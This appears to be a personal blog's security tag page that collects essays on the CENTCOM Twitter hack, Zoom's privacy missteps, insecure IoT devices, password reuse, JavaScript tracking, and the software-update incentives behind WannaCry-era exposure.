Showing all posts tagged security:

Old Views For Today's News

Here's a blog post I wrote back in 2015 for my then-employer that I was reminded of while recording the latest episode of the Roll For Enterprise podcast. Since the original post no longer seems to be available via the BMC web site, I assume they won't mind me reposting it here, with some updated commentary.
cia.png

xkcd, CIA

There has been a certain amount of excitement in the news media, as someone purportedly associated with ISIL has taken over and defaced US Central Command's Twitter account. The juxtaposition with recent US government pronouncements on "cyber security" (ack) is obvious: Central Command’s Twitter Account Hacked…As Obama Speaks on Cybersecurity.

The problem here is the usual confusion around IT in general, and IT security in particular. See for instance CNN:

The Twitter account for U.S. Central Command was suspended Monday after it was hacked by ISIS sympathizers -- but no classified information was obtained and no military networks were compromised, defense officials said.

To an IT professional, even without specific security background, this is kind of obvious.

shucking-a-tutorial.jpgPenny Arcade, Brains With Urgent Appointments

However, there is a real problem here. IT professionals also have a blind spot here: they don't think of things like Twitter accounts when they are securing IT infrastructure. This oversight can expose organisations to serious problems.

One way this can happen is credential re-use and leaking in general. Well-run organisations will use secure password-sharing services such as LastPass, but many times without IT guidance teams might instead opt for storing credentials in a spreadsheet, as we now know happened at Sony. If someone got their hands on even one set of credentials, what other services might they be able to unlock?

The wider issue is the notion of perimeter defence. IT security to date has been all about securing the perimeter - firewalls, DMZs, NAT, and so on. Today, though, what is the perimeter? End-user services like Dropbox, iCloud, or Google Docs, as well as multi-tier enterprise applications, span back and forth across the firewall, with data stored and code executed both locally and remotely.

I don't mean to pick on Sony in particular - they are just the most recent victims - but their experience has shown once and for all that focusing only on the perimeter is no longer sufficient. The walls are porous enough that it is no longer possible to assume that bad guys are only outside. Systems and procedures are needed to detect anomalous activity inside the network, and once that occurs, to handle it rapidly and effectively.

This cannot happen if IT is still operating as "the department of NO", reflexively refusing user requests out of fear or potential consequences. If the IT department tries to ban everything, users will figure out a way to go around the restrictions to achieve their goals. The risk then is that they make choices which put the entire organisation and even its customers at risk. Instead, IT needs to engage with those users and find creative, novel ways to deliver on their requirements without compromising on their mandate to protect the organisation.

While corporate IT cannot be held responsible for the security of services such as Twitter, they can and should advise social-media teams and end-users in general on how to protect all of their services, inside and outside the perimeter.

There are a still a lot of areas where IT is focused on perimeter defence. Adopting Okta or another SSO service is not a panacea; you still do need to consider what would happen when (not if) someone gets inside the first layer of defence. How would you detect them? How would you stop them?

The Okta breach has also helpfully provided an example of another important factor in security breaches: comms. Okta's comms discipline has not been great, reacting late, making broad denials that they later had to walk back, and generally adding to the confusion rather than reducing it. Legislation is being written around the world (with the EU as usual taking the lead) to mandate disclosure in situations like these, which may focus minds — but really, if you're not sufficiently embarrassed as a security provider that a bunch of teenagers were apparently running around your network for at least two weeks without you detecting them, you deserve all the fines you're going to get.

These are no longer purely tech problems. Once you get messy humans in the mix, the conversation changes from "how many bits of entropy does the encryption algorithm need" to "what is the correct trade-off between letting people get their jobs done and ensuring a reasonable level of security, given our particular threat model". Working with humans means communicating with them, so you’d better have a plan ready to go for what to say in a given situation. Hint: blanket denials early on are generally a bad idea, leaving hostages to fortune unnecessarily.

Have a plan ready to go for what you will say in a given situation (including what you may be legally mandated to disclose, and on what timeframe), and avoid losing your customers’ trust. Believe me, that’s one sort of zero trust that you don’t want!

The Thing With Zoom

Zoom was having an excellent quarantine — until it wasn’t.

This morning’s news is from Bloomberg: Zoom Sued for Fraud Over Privacy, Security Flaws. But how did we get here?

Here is what’s interesting about the Thing with Zoom: it’s an excellent example of a company getting it mostly right for its stated aims and chosen target market — and still getting tripped up by changing conditions.

To recap, very quickly: with everybody suddenly stuck home and forbidden to go to the office, there was an equally sudden explosion in video calling — first for purely professional reasons, but quickly spreading to virtual happy hours, remote karaoke, video play dates, and the like. Zoom was the major beneficiary of this growth, with daily active users going from 10 million to over 200 million in 3 months.

One of the major factors that enabled this explosive growth in users is that Zoom has always placed a premium on ease of use — some would argue, at the expense of other important aspects, such as the security and privacy of its users.

There is almost always some tension between security and usability. Security features generally involve checking, validating, and confirming that a user is entitled to perform some action, and asking them for permission to take it. Zoom generally took the approach of not asking users questions which might confuse them, and removing as much friction as possible from the process of getting users into a video call — which is, after all, the goal of its enterprise customers.

Doing The Right Thing — Wrong

I cannot emphasise enough that this focus on ease of use is what made Zoom successful. I think I have used every alternative, from the big names like WebEx (even before its acquisition by Cisco!), to would-be contenders like whatever Google’s thing is called this week, to has-beens like Skype, to also-rans like BlueJeans. The key use case for me and for Zoom’s other corporate customers is, if I send one of my prospects a link to a video call, how quickly can they show up in my call so that I can start my demo? Zoom absolutely blew away the competition at this one crucial task.

Arguably, Zoom pushed their search for ease of use a bit too far. On macOS, if you click on a link to a Zoom chat, a Safari window will open and ask you whether you want to run Zoom. This one click is the only interaction that is needed, especially if you already have Zoom installed, but it was apparently still too much — so Zoom actually started bundling a hidden web server with their application, purely so that they could bypass this alert.

Sneaking a web server onto users’ systems was bad enough, but worse was to come. First of all, Zoom’s uninstall routine did not remove the web server, and it was capable of reinstalling the Zoom client without user interaction. But what got the headlines was the vulnerability that this combination enabled: a malicious website could join visitors to a Zoom conference, and since most people had their webcam on by default, active video would leak to the attacker.

This behaviour was so bad that Apple actually took the unprecedented step of issuing an operating system patch to shut Zoom down.

Problem solved?

This hidden-web-server saga was a preview run for what we are seeing now. Zoom had over-indexed on its customers, namely large corporations who were trying to reach their own customers. The issue with being forcibly and invisibly joined to a Zoom video conference simply by visiting a malicious web server did not affect those customers – but it did affect Zoom’s users.

The distinction is one that is crucial in the world of enterprise software procurement, where the person who signs the cheque is rarely the one who will be using the tool. Because of this disconnect, vendors by and large optimise for that economic buyer’s requirements first, and only later (if at all) on the actual users’ needs.

With everyone locked up at home, usage of Zoom exploded. People with corporate accounts used them in the evening to keep up with their social lives, and many more signed up for the newly-expanded free tier. This new attention brought new scrutiny, and from a different angle from what Zoom was used to or prepared for.

For instance, it came to light that the embedded code that let users log in to Zoom on iOS with their Facebook credentials was leaking data to Facebook even for users without a Facebook account. Arguably, Zoom had not done anything wrong here; as far as I can tell, the leakage was due to Facebook’s standard SDK grabbing more data than it was supposed to have, in a move that is depressingly predictable coming from Facebook.

In a normal circumstance, Zoom could have apologised, explained that they had moved too quickly to enable a consumer feature that was outside their usual comfort zone without understanding all the implications, and moved on. However, because of the earlier hidden-web-server debacle, there was no goodwill for this sort of move. Zoom did act quickly to remove the offending Facebook code, but worse was to come.

Less than a week later, another story broke, claiming that Zoom is Leaking Peoples' Email Addresses and Photos to Strangers. Here is where the story gets really instructive.

Uh oh, it looks like your embed code is broken.

This "leak" is due to the sort of strategy tax that was almost inevitable in hindsight. Basically, Zoom added a convenience feature for its enterprise customers, called Company Directory, which assumes that anyone sharing the same domain in their email address works for the same company. In line with their guiding principle of building a simple and friction-free user experience, this assumption makes it easier to schedule meetings with one’s colleagues.

The problem only arose when people started joining en masse from their personal email accounts. Zoom had excluded the big email providers, so that people would not find themselves with millions of "colleagues" just because they had all signed up with Gmail accounts. However, they had not made an exhaustive list of all email providers, and so users found themselves with "colleagues" who simply happened to be customers of the same ISP or email provider. The story mentioned Dutch ISPs like xs4all.nl, dds.nl, and quicknet.nl, but the same issue would presumably apply to all small regional ISPs and niche email providers.

Ordinarily, this sort of "privacy leak" is a storm in a teacup; it’s no worse than a newsletter where all the names are in the To: line instead of being in Bcc:. However, by this point Zoom was in the full glare of public attention, and the story blew up even in the mainstream press, outside of the insular tech world.

Now What?

Zoom’s CEO, Eric Yuan, issued a pretty comprehensive apology. I will quote the key paragraphs below:

First, some background: our platform was built primarily for enterprise customers – large institutions with full IT support. These range from the world’s largest financial services companies to leading telecommunications providers, government agencies, universities, healthcare organizations, and telemedicine practices. Thousands of enterprises around the world have done exhaustive security reviews of our user, network, and data center layers and confidently selected Zoom for complete deployment.

However, we did not design the product with the foresight that, in a matter of weeks, every person in the world would suddenly be working, studying, and socializing from home. We now have a much broader set of users who are utilizing our product in a myriad of unexpected ways, presenting us with challenges we did not anticipate when the platform was conceived.

These new, mostly consumer use cases have helped us uncover unforeseen issues with our platform. Dedicated journalists and security researchers have also helped to identify pre-existing ones. We appreciate the scrutiny and questions we have been getting – about how the service works, about our infrastructure and capacity, and about our privacy and security policies. These are the questions that will make Zoom better, both as a company and for all its users.

We take them extremely seriously. We are looking into each and every one of them and addressing them as expeditiously as we can. We are committed to learning from them and doing better in the future.

It’s too early to say what the long-term consequences for Zoom will be, but this is a good apology, and a reasonable set of early moves by the company to repair its public image. To be clear, the company still has a long way to go, and to succeed, it will need to rebalance its exclusive focus on usability to be much more considerate of privacy and security.

For instance, there were a couple of zero-days bugs found in the macOS client (since patched in Version 4.6.9) which would have allowed for privilege escalation. These particular flaws cannot be remotely exploited, so they would require would-be attackers to have access to the operating system already, but it’s still far from ideal. In particular, one of these bugs took advantage of some shortcuts that Zoom had taken in its installer, once again in the name of ease-of-use.

Installers on macOS have the option of running a "preflight" check, where they verify all their prerequisites are met. After this step, they will request confirmation from the user before running the installer proper. Zoom’s installer actually completed all its work in this preflight step, including specifically running a script with root (administrator) privileges. This script could be replaced by an attacker, whose malicious script would then be run with those same elevated privileges.

Personally I hope that Zoom figures out a way to resolve this situation. The user experience is very pleasant (even after installation!), and given that I work from home all the time — not just in quarantine — Zoom is a key part of my work environment.

Lessons To Learn

1: Pivoting is hard

Regardless of the outcome for Zoom, though, this is a cautionary tale in corporate life and communications. Zoom was doing everything right for its previous situation, but this exclusive focus made it difficult to react to changes in that situation. The pivot from corporate enterprise users to much larger numbers of personal users is an opportunity for Zoom if they can monetise this vastly expanded user base, but it also exposes them to a much-changed environment. Corporate users are more predictable in their environments and routines, and in the way they interact with apps and services. Home users will do all sorts of unexpected things and come from unexpected places, exposing many more edge cases in developers’ assumptions.

Companies should not assume that they can easily "pivot" to a whole new user population, even one that is attractively larger and more promising of profits, without making corresponding changes to core assumptions about how they go to market.

2: A good reputation once lost is hard to regain

A big part of Zoom’s problem right now is that they had squandered their earlier goodwill with techies when they hid a web server on their machines. Without that earlier situation, they might have been able to point out that many of the current problems are on the level of tempests in teacups — bugs to be sure, which need to be fixed, but hardly existential PROBLEMS.

As it happened, though, the Internet hive mind was all primed to think the worst of Zoom, and indeed actively went looking for issues once Zoom was in the glare of the spotlight. In this situation, there is not much to be done in the short term, apart from what Zoom actually did: apologise profusely, promise not to do it again, and attempt to weather the storm.

One move I have not yet seen them make which would be very powerful would be to hire a well-known security expert with a reputation for impartiality. One part of their job would be to act as figurehead and lightning conductor for the company’s security efforts, but an equally important part would be as internal naysayer: the VP of Nope, someone able to say a firm NO to bad ideas. Hiding a web server? Bad idea. Shortcutting the installer? Bad idea. Assuming everyone with an email address not on a very short list of mega-providers is a colleague of everyone else with the same email domain? Bad idea.


UPDATE: Showing how amazingly prescient this recommendation was, shortly after I published this post, Alex Stamos announced that he was joining Zoom to help them "build up their security program":

Uhoh, This content has sprouted legs and trotted off.

Alex Stamos is of course the ex-CSO at Facebook, who since departing FB has made something of a name for himself by commenting publicly about security and privacy issues. As such, he’s pretty much the perfect hire: high public profile, known as an impartial expert, and deeply experienced specifically in end-user security issues, not just the sort of enterprise aspects which Zoom had previously been focusing on.

I will be watching his and Zoom’s next moves with interest.


3: Bottom line: build good products

Most companies need to review both security and usability — but it’s probably worth noting that a good product is the best way of saving yourself. Even in a post-debacle roundup of would-be alternatives to Zoom, Zoom still came out ahead, despite being penalised for its security woes. They still have the best product, and, yes, the one that is easiest to use.

But if you get the other two factors right, you, your good product, and your long-suffering comms team will all have an easier life.


🖼️ Photos by Allie Smith on Unsplash

The Internet of Unwelcome Gifts

It’s that time of year when many of us are out buying gifts for ourselves or others – or if you’re tight like me, waiting for the sales in the New Year to buy those big-ticket items. Ahem. Regardless, please do not buy IoT / "smart" devices as gifts for people you care about.

Here’s the thing: at this point in time, most people who want a dedicated assistant-in-a-can device already have one. If they don’t own one already, it may be because they realise they will hardly use it – most of these things are only ever used to play music and maybe set a timer. The first many of us knew about Amazon’s efforts to sell Alexa skills for actual cash money was when they missed their revenue forecast… badly. How badly did they miss? Well, against what I would have thought was a pretty conservative target by Amazon’s standards of $5M, they achieved… $1.4M. That’s 28% attainment, also known in sales circles as "pack up your desk and get out – and be quick about it, I already called Security". In other words, very few people are using Skills at all, and basically none are using for-pay skills.

Of course there are any number of surreptitiously "smart" devices. For instance, these days it is pretty much impossible to buy a consumer TV without an operating system powerful enough to connect to the Internet over wifi and run streaming-video apps. This also means they are powerful enough to snoop on user’s behaviour. You might think this is not too bad – after all, YouTube already knows exactly which cute cat videos you watched – but these days, the state of the art is capturing whatever is displayed on screen, and trying to run analytics on that. If you watch home videos or display your photos, well, the privacy policy you clicked through when you set up the TV says it’s okay for the company to own those now. This is why even staid Consumer Reports is offering advice to turn off snooping features in smart TVs — and yes, they called it "snooping", not me.

If you think TVs are bad, other categories are even worse; see this IEEE report that calls out security risks of drones, vibrators, and children’s toys.

All of this means that there is a good chance that your possible gift recipient, especially if they are technically inclined, considered and rejected smart devices for security reasons. In case you think I’m just a lone crank over here in my tinfoil hat, it’s worth noting that the FBI issued notices about securing smart TVs around Black Friday, while the French government just sent out this warning about internet-connected food processor.

At least someone with some technical skills might have a chance of heading off the snooping at the network edge with something like a Pi-Hole. Definitely don’t buy anything with an Internet connection for your Muggle friends and relatives!

This is the sort of thing that Mozilla’s excellent Privacy Not Included project is designed to highlight. Note that this is not a blanket anti-tech position; if you browse over to the Privacy Not Included site, there are a ton of "smart" devices that are not creepy. But then there are the others, such as the infamous Ring camera, which manages a hat trick of terrible security, accommodation with a surveillance-driven police state, and enablement and reinforcement of racist tendencies.

In this context, Apple’s announcement that they are joining forces with Amazon, Google, and Zigbee to establish a new, more secure and interoperable IoT standard may be a hopeful sign that the Wild West era of ill-considered experimentation in IoT is coming to an end – or it may be a well-intentioned standard that simply ends up gathering dust on a shelf in Cupertino.

Turn up the heating, I’m freezing!
I’m sorry Dave, I can’t let you do that.

Regardless, don’t buy any devices that are too smart for their own good – or more importantly, yours. If there is no good reason for a thing to be "smart", then stick to the dumb version: it no doubt works better today, and won’t be obsolete tomorrow when the vendor goes out of business or simply terminates support for that product line.

Don't Blame The User

It would be easy to write a blog post about every single XKCD strip, so I try not to – but the latest one drives at something very interesting in infosec.

Some of the default infosec advice that is always given out is to avoid reusing passwords on different sites. This is good advice as far as it goes, but it misses one key aspect. Too many sites force people to create accounts for no good reason ("create an account to use our free wifi"), and so people use throwaway passwords, and reuse them across many of these low-risk sites. In the XKCD example above, if someone cracks the Smash Mouth message boards, maybe they get to reuse the password to gain access to the Limp Bizkit boards, but ideally they won’t get access to Venmo, because that not only has a different, higher-grade password, but is also secured by 2FA1.

The good news is that it’s becoming easier than ever to generate secure passwords and avoid reusing them. If you’re an Apple user, the iCloud Keychain is built right into both iOS and macOS, and will generate and remember secure passwords for you, securing them with FaceID or TouchID. There are of course any number of third-party options as well, but the point is that security needs to be easy. People who care about security will sign up for Have I Been Pwned; general users just trying to get through their day will not.

The first priority is making it work at all, the second is making it usable; regrettable as it may be, security comes after those primary concerns. The easier it is for users to do the right thing, the more likely it is that they will do it. Browbeating them after a breach because they didn’t jump through precisely the right hoops in exactly the right sequence is not helpful. What will help is putting the effort into helping them up front, including in the service design itself.

Previously, previously.


  1. Note, I have no idea whether Venmo actually supports 2FA; not being in the US, I don’t / can’t use it. For "Venmo", read "online banking" or whatever other high-security example. 

Future Trends In Due Diligence

This story is amazing on so many levels. International banking intrigue on the Eurostar, court cases, huge companies’ deals in jeopardy… It has everything!

The whole story (and associated court case) stems from an episode of shoulder surfing on Eurostar. The Lazard banker working on Iliad’s attempted takeover of T-Mobile US was not paying attention to the scruffy dude sitting beside him on the train. Unfortunately for him, that scruffy dude worked for UBS, and was able to put two and two together (with the assistance of a colleague).

If the Lazard banker had traded on this information, it would have been considered insider trading. However, the judge determined that the information gathered by shoulder-surfing was not privileged, as the UBS banker could not be considered an "insider" (warning, IANAL).

This is why you do not conduct sensitive conversations in trains, airport lounges, and the like. Also, if you are working on information this momentous, one of those screen protectors is probably a worthwhile investment. I have seen and overheard so much information along these lines, although unfortunately I am never in a position to take advantage of any of it.

As usual, humans are the weakest link in any security policy. This is particularly humorous since today I found that, at some point over the Easter break, corporate IT has disabled iCloud Drive on our Macs. Dropbox and my personal login to Google Drive / File Stream / whatever-it’s-called-this-week all still work though…

A particularly paranoid form of security audit would include shadowing key employees on their commutes or business travel to see how well company information is protected. But probably not. It’s much easier just to install annoying agents on everybody’s machines, tick that box, and move on.


Image is a still from this excellent video by ENISA.

The Internet of (Insecure) Things

Back in 2014, I wrote an article entitled Why the Blinking Twelves is an Internet of Things problem in the making. If you’re not familiar with the idiom of the "blinking twelves", allow me to enlighten you:

Back in the last century, digital clocks with seven-segment displays became ubiquitous, including as part of other items of home electronics such as VCRs. When first plugged in, these would blink "12:00" until the time was set by the user.
Technically-minded people soon noticed that when they visited less technical friends or relatives, all the appliances in the house would still be showing the "blinking twelves" instead of the correct time. The "blinking twelves" rapidly became short-hand for "civilians" not being able to – or not caring to – keep up with the demands of ubiquitous technology.
One of the most frustrating things for techies about the "blinking twelves" was that nobody else seemed to care or even notice the problem that was driving them nuts. How could people not see the blinking twelves all around them, and do something about them?
It took Windows for the problem to become obvious. Windows computers, brought a much higher level of technological complexity, the computer needed regular maintenance and people rapidly realised that updates and patches were required at regular intervals if their computers were to remain functional and secure.
The problem that we are facing is that technology has already begun to spread beyond the desktop. Even the most technophobic now carry a phone that is "smart" to a greater or lesser degree and many people treat these devices much like their old VCRs, installing them once and then forgetting about them. However, all of these devices are running 24/7, connected to the public Internet, with little to no management or updates.

In the three years since I wrote that article, the number of Internet-enabled devices has simply exploded.

I know, it’s from Business Insider, take it with a large grain of salt - but the trend is unarguable.

Here’s the problem: all of those Internet-enabled Things are cheap, and therefore based on existing components, including software. Most software, at least below the level of the specialised RTOSen found in nuclear power plants and the like, is built around the assumption of regular maintenance and updates provided by knowledgeable operators. However, once these Things are deployed in the field, where "in the field" often means the home or office of people who are not IT professionals, it is a given that they will not receive that level of care.

When something like Krack hits, the odds are good that manufacturers for many devices will already have disappeared without providing patches. Even for devices from more stable vendors who do provide ongoing support, maybe the device is obsolete and replaced by newer versions with incompatible architectures. But even supposing that all the stars align and the patch is available, it will still not be deployed widely - because of the "blinking twelves" problem. Non-specialist owners will not know or care to update their devices, and so the cycle continues.

Our only hope is that we are saved by our devices' obsolescence, as the lack of updates eventually prevents them from functioning at all. Maybe this won’t be the final straw, but soon enough the figleaf in every click-through agreement about the software being "provided as is" and "no warranty of merchantability or fitness for purpose" will be ripped away, in favour of the sorts of consumer protection regulations that these same devices would be subject to if they were not Internet-enabled.

The alternative is that in the Smart Home of the Future that we keep being promised, troubleshooting steps really will require us to close all the windows, exit, and start what we were doing all over again.

Me, I’ll move to a cabin in the woods.


Photo by Heather Zabriskie on Unsplash

The Enemy Within The Browser

At what point do the downsides of Javascript in the browser exceed the upsides? Have we already passed that point?

If you have any concept of security, the idea of downloading code from the Internet and immediately executing it, sight unseen, on your local machine, should give you the screaming heebie-jeebies. A lot of work has gone into sandboxing the browser processes so that Javascript cannot escape the browser itself, and later, the individual web page that it came from. However, this only dealt with the immediate and obvious vulnerability.

These days, the problem with Javascript is that it is used to track users all over the internet and serve them ads for the same products on every site. Quite why this requires 14 MB and 330 HTTP requests for 537 words is not entirely clear.

Actually, no, it is entirely clear: it is because the copro-grammers ("writers of feces") who produce this stuff have no respect for the users. The same utter disrespect underlies the recent bloat in iOS apps:

One Friday I turned off auto-update for apps and let the update queue build up for a week. The results shocked me.
After the first week I had 7.59GB of updates to install, spread across 67 apps – averaging 113MB per app.

Okay, so maybe you say who cares, you only update apps over wifi - but do you only browse on wifi? 14 MB for a few hundred words - that adds up fast.

And what else is that Javascript up to, beyond wasting bytes - both over the air, and in local storage?

How about snaflling data entered into a form, regardless of whether it has been submitted?

Using Javascript, those sites were transmitting information from people as soon as they typed or auto-filled it into an online form. That way, the company would have it even if those people immediately changed their minds and closed the page.

My house, my rules. I look forward to iOS 11, and enabling every blocking feature I can.

I really want media sites to earn money so that they can continue to exist, but they cannot do it at my expense. A banner ad is fine, but 14 MB of Javascript to serve me the same banner ad everywhere - at my expense! - is beyond the pale.

Javascript delenda est.

Incentives Drive Behaviour - Security Is No Exception

Why is security so hard?

Since I no longer work in security, I don’t have to worry about looking like an ambulance-chasing sales person, and I can opine freely about the state of the world.

The main problem with security is the intersection of complexity and openness. In the early days of computers there was a philosophical debate about the appropriate level of security to include in system design. The apex of openness was probably MIT’s Incompatible Time-Sharing System, which did not even oblige users to log on - although it was considered polite to do so.

I will just pause here to imagine that ethos of openness in the context of today’s social media, where the situation is so bad that Twitter felt obliged to change its default user icon because the "egg" had become synonymous with bad behaviour online.

By definition, security and openness are always in opposition. Gene "Spaf" Spafford, who knows a thing or two about security, famously opined that:

The only truly secure system is one that is powered off, cast in a block of concrete and sealed in a lead-lined room with armed guards - and even then I have my doubts.

Obviously, such a highly-secure system is not very usable, so people come up with various compromises based on their personal trade-off between security and usability. The problem is that this attempt to mediate between two opposite impulses adds complexity to the system, which brings its own security vulnerabilities.

Ultimately, IT security is a constant Red Queen’s Race, with operators of IT systems rushing to patch the latest flaws, knowing all the while that more flaws are lurking behind those, or being introduced with new functionality.

Every so often, maintainers of a system will just throw up their hands, declare a system officially unmaintainable, and move to something else. This process is called "End of Life", and is supposed to coincide with users also moving to the new supported platform.

Unfortunately this mass upgrade does not always take place. Many will cite compatibility as a justification, and certainly any IT technician worth their salt knows better than to mess with a running system without a good reason. More often, though, the reason is cost. In a spreadsheet used to calculate the return on different proposed investments, "security" falls under the heading of "risk avoidance"; a nebulous event in the future, that may become less probable if the investment is made.

For those who have not dealt with many finance people, as a rule, they hate this sort of thing. Unless you have good figures for both the probability of the future event and its impact, they are going to be very unhappy with any proposed investment on that basis.

The result is that old software sticks around long after it should have been retired.

As recently as November 2015, it emerged that Paris’ Orly airport was still operating on Windows 3.1 - an operating system that has not been supported since 2001.

The US military still uses 8" floppy disks for its ICBMs:

"This system remains in use because, in short, it still works," Pentagon spokeswoman Lt Col Valerie Henderson told the AFP news agency.

And of course we are still dealing with the fallout from the recent WannaCry ransomware worm, targeting Windows XP - an operating system that has not been supported since 2014. Despite that, it is still the fourth most popular version of Windows (behind Windows 7, Windows 10, and Windows 8.1), with 5.26% share.

Get to the Point!

It’s easy to mock people still using Windows XP, and to say that they got no more than they deserved - but look at that quote from the Pentagon again:

"This system remains in use because, in short, it still works"

Windows XP still works fine for its users. It is still fit for purpose. The IT industry has failed to give those people a meaningful reason to upgrade - and so many don’t, or wait until they buy new hardware and accept whatever comes with the new machine.

Those upgrades do not come nearly as frequently as they used to, though. In the late Nineties and early Oughts, I upgraded my PC every eighteen months or so (as funds permitted), because every upgrade brought huge, meaningful differences. Windows 95 really was a big step up from Windows 3.1. On the Mac side, System 7 really was much better than System 6. Moving from a 486 to a Pentium, or from 68k to PowerPC, was a massive leap. Adding a 3dfx card to your system made an enormous difference.

Vice-versa, a three-year-old computer was an unusable pile of junk. Nerds like me installed Linux on them and ran them side by side with our main computers, but most people had no interest in doing such things.

These days, that’s no longer the case. For everyday web browsing, light email, and word processing, a decade-old computer might well still cut it.

That’s not even to mention institutional use of XP; Britain’s NHS, for instance, was hit quite hard by WannaCry due to their use of Windows XP. For large organisations like the NHS, the direct financial cost of upgrading to a newer version of Windows is a relatively small portion of the overall cost of performing the upgrades, ensuring compatibility of all the required software, and retraining literally hundreds of thousands of staff.

So, users have weak incentives to upgrade to new, presumably more secure, versions of software; got it. Should vendors then be obliged to ship them security patches in perpetuity?

Zeynep Tufekci has argued as much in a piece for the New York Times:

First, companies like Microsoft should discard the idea that they can abandon people using older software. The money they made from these customers hasn’t expired; neither has their responsibility to fix defects.

Unfortunately, it’s not that simple, as Steven Bellovin explains:

There are two costs, a development cost $d and an annual support cost $s for n years after the "warranty" period. Obviously, the company pays $d and recoups it by charging for the product. Who should pay $n·s?

The trouble is that n can be large; the support costs could thus be unbounded.

Can we bound n? Two things are very clear. First, in complex software no one will ever find the last bug. As Fred Brooks noted many years ago, in a complex program patches introduce their own, new bugs. Second, achieving a significant improvement in a product's security generally requires a new architecture and a lot of changed code. It's not a patch, it's a new release. In other words, the most secure current version of Windows XP is better known as Windows 10. You cannot patch your way to security.

Incentives matter, on the vendor side as well as on the user side. Microsoft is not incentivised to do further work on Windows XP, because it has already gathered all the revenue it is ever going to get from that product. From a narrowly financial perspective, Microsoft would prefer that everyone purchase a new license for Windows 10, either standalone or bundled with the purchase of new hardware, and migrate to that platform.

Note that, as Steven Bellovin points out above, this is not just price-gouging; there are legitimate technical reasons to want users to move to the latest version of your product. However, financial incentives do matter, a lot.

This is why if you care about security, you should prefer services that come with a subscription.

If you’re not Paying, you’re the Product

Subscription licensing means that users pay a recurring fee, and in return, vendors provide regular updates, including both new features and fixes such as security patches.

As usual, Ben Thompson has a good primer on the difference between one-off and subscription pricing. His point is that subscriptions are better for both users and vendors because they align incentives correctly.

From a vendor’s perspective, one-off purchases give a hit of revenue up front, but do not really incentivise long-term engagement. It is true that in the professional and enterprise software world, there is also an ongoing maintenance charge, typically on the order of 18-20% per year. However, that is generally accounted for differently from sales revenue, and so does not drive behaviour to nearly the same extent. In this model, individual sales people have to behave like sharks, always in motion, always looking for new customers. Support for existing customers is a much lower priority.

Vice versa, with a subscription there is a strong incentive for vendors to persuade customers to renew their subscription - including by continuing to provide new features and patches. Subscription renewal rates are scrutinised carefully by management (and investors), as any failure to renew may well be symptomatic of problems.

Users are also incentivised to take advantage of the new features, since they have already paid for them. When upgrades are freely available, they are far more likely to be adopted - compare the adoption rate for new MacOS or iOS versions to the rate for Windows (where upgrades cost money) or Android (where upgrades might not be available, short of purchasing new hardware).

This is why Gartner expects that by 2020, more than 80 percent of software vendors will change their business model from traditional license and maintenance to subscription.

At Work - and at Home, Too

One final point: this is not just an abstract discussion for multi-million-euro enterprise license agreements. The exact same incentives apply at home.

A few years ago, I bought a cordless phone that also communicated with Skype. From the phone handset, I could make or answer either a POTS call, or a Skype voice call. This was great - for a while. Unfortunately the hardware vendor never upgraded the phone’s drivers for a new operating system version, which I had upgraded to for various reasons, including improved security.

For a while I soldiered on, using various hacks to keep my Skype phone working, but when the rechargeable batteries died, I threw the whole thing in the recycling bin and got a new, simpler cordless phone that did not depend on complicated software support.

A cordless phone is simple and inexpensive to replace. Imagine that had been my entire Home of the Future IoT setup, with doorbells, locks, alarms, thermostats, fridges, ovens, and who knows what else. "Sorry, your home is no longer supported."1

With a subscription, there is a reasonable expectation that vendors will continue to provide support for the reasonable lifetime of their products (and if they don’t, there is a contract with the force of law behind it).

Whether it’s for your home or your business, if you rely on it, make sure that you pay for a subscription, so that you can be assured of support from the vendor.


  1. Smart home support: "Have you tried closing all the windows and then reopening them one by one?" 

Talk Softly

With the advent of always-on devices that are equipped with sensitive microphones and a permanent connection to the Internet, new security concerns are emerging.

Virtual assistants like Apple’s Siri, Microsoft’s Cortana and Google Now have the potential to make enterprise workers more productive. But do "always listening" assistants pose a serious threat to security and privacy, too?

Betteridge’s Law is in effect here. Sure enough, the second paragraph of the article discloses its sources:

Nineteen percent of organizations are already using intelligent digital assistants, such as Siri and Cortana, for work-related tasks, according to Spiceworks’ October 2016 survey of 566 IT professionals in North America, Europe, the Middle East and Africa.

A whole 566 respondents, you say? From a survey run by a help desk software company? One suspects that the article is over-reaching a bit - and indeed, if we click through to the actual survey, we find this:

Intelligent assistants (e.g., Cortana, Siri, Alexa) used for work-related tasks on company-owned devices had the highest usage rate (19%) of AI technologies

That is a little bit different from what the CSO Online article is claiming. Basically, anyone with a company-issued iPhone who has ever used Siri to create an appointment, set a reminder, or send a message about anything work-related would fall into this category.

Instead, the article makes the leap from that limited claim to extrapolating that people will be bringing their Alexa device to work and connecting it to the corporate network. Leaving aside for a moment the particular vision of hell that is an open-plan office where everyone is talking into the air all the time, what does that mean for the specific recommendations in the article?

  1. Focus on user privacy
  2. Develop a policy
  3. Treat virtual assistant devices like any IoT device
  4. Decide on BYO or company-owned
  5. Plan to protect

These are actually not bad recommendations - but they are so generic as to be useless. Worse, when they do get into specifics, they are almost laughably paranoid:

Assume all devices with a microphone are always listening. Even if the device has a button to turn off the microphone, if it has a power source it’s still possible it could be recording audio.

This is drug-dealer level of paranoia. Worrying that Alexa might be broadcasting your super secret and valuable office conversations does not even make the top ten list of concerns companies should have about introducing such devices into their networks.

The most serious threat you can get from Siri at work is co-workers pranking you if you enable access from the lock screen. In that case, anyone can grab your unattended iPhone and instruct Siri to call you by some ridiculous name. Of course I would never sabotage a colleague’s phone by renaming him "Sweet Cakes". Ahem. Interestingly, it turns out that the hypothetical renaming also extends to the entry in the Contacts…

The real concern is that by focusing on these misguided recommendations, the focus is taken off advice that would actually be useful in the real world. For instance, if you must have IoT devices in the office for some reason, this is good advice:

One way to segment IoT devices from the corporate network is to connect them to a guest Wi-Fi network, which doesn’t provide access to internal network resources.

This recommendation applies to any device that needs Internet access but does not require access to resources on the internal network. This will avoid issues where, by compromising a device (or its enabling cloud service), intruders are able access your internal network in what is known as a "traversal attack". If administrators restrict the device’s access to the network, that will also restrict the amount of damage an intruder can do.

Thinking about access to data is a good idea in general, not just for voice assistants or IoT devices:

Since personal virtual assistants "rely on the cloud to comprehend complex commands, fetch data or assign complex computing tasks to more resources," their use in the enterprise raises issues about data ownership, data retention, data and IP theft, and data privacy enforcement that CISOs and CIOs will need to address.

Any time companies choose to adopt a service that relies on the cloud, their attack surface is not limited to the device itself, but also extends to that back-end service - which is almost certainly outside their visibility and control. Worse, in a BYOD scenario, users may introduce new devices and services to the corporate network that are not designed or configured for compliance with organisations’ security and privacy rules.

